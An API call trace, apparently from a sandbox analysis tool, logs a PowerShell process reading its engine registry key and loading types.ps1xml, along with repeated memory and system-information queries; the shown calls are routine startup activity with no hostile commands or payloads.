	[0396.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d768 | out: phkResult=0x28d768*=0x334) returned 0x0
	[0396.135] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6ec, lpData=0x0, lpcbData=0x28d6e8*=0x0 | out: lpType=0x28d6ec*=0x1, lpData=0x0, lpcbData=0x28d6e8*=0x56) returned 0x0
	[0396.135] CoTaskMemAlloc (cb=0x5a) returned 0x188e20
	[0396.135] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6bc, lpData=0x188e20, lpcbData=0x28d6b8*=0x56 | out: lpType=0x28d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d6b8*=0x56) returned 0x0
	[0396.135] CoTaskMemFree (pv=0x188e20) 
	[0396.135] RegCloseKey (hKey=0x334) returned 0x0
	[0396.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.520] GetSystemInfo (in: lpSystemInfo=0x28c3a0 | out: lpSystemInfo=0x28c3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0396.521] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.532] SetErrorMode (uMode=0x1) returned 0x1
	[0396.532] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0396.532] GetFileType (hFile=0x330) returned 0x1
	[0396.532] SetErrorMode (uMode=0x1) returned 0x1
	[0396.532] GetFileType (hFile=0x330) returned 0x1
	[0396.532] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.533] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.533] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.533] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.534] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.534] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.534] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.534] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.534] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.535] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.535] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.536] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.536] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.536] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.536] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.536] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.537] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.538] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.538] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.538] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.538] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.539] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.540] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.540] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.540] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.540] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.540] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.541] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.542] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.542] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.543] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.543] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.543] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.543] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.543] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.544] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0396.544] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x1b4, lpOverlapped=0x0) returned 1
	[0396.544] ReadFile (in: hFile=0x330, lpBuffer=0x2ce65d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2ce65d8*, lpNumberOfBytesRead=0x28d708*=0x0, lpOverlapped=0x0) returned 1
	[0396.544] CloseHandle (hObject=0x330) returned 1
	[0396.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.544] SetErrorMode (uMode=0x1) returned 0x1
	[0396.544] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d680 | out: lpFileInformation=0x28d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0396.544] SetErrorMode (uMode=0x1) returned 0x1
	[0396.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d768 | out: phkResult=0x28d768*=0x330) returned 0x0
	[0396.545] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6ec, lpData=0x0, lpcbData=0x28d6e8*=0x0 | out: lpType=0x28d6ec*=0x1, lpData=0x0, lpcbData=0x28d6e8*=0x56) returned 0x0
	[0396.545] CoTaskMemAlloc (cb=0x5a) returned 0x1b765a90
	[0396.545] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6bc, lpData=0x1b765a90, lpcbData=0x28d6b8*=0x56 | out: lpType=0x28d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d6b8*=0x56) returned 0x0
	[0396.545] CoTaskMemFree (pv=0x1b765a90) 
	[0396.545] RegCloseKey (hKey=0x330) returned 0x0
	[0396.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0397.293] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.300] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.301] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.301] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.301] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.301] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.302] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.303] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.312] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.313] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.313] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.320] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.655] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.656] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.660] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.661] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.661] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.661] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.661] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.661] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.662] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.662] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.662] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.662] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.663] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
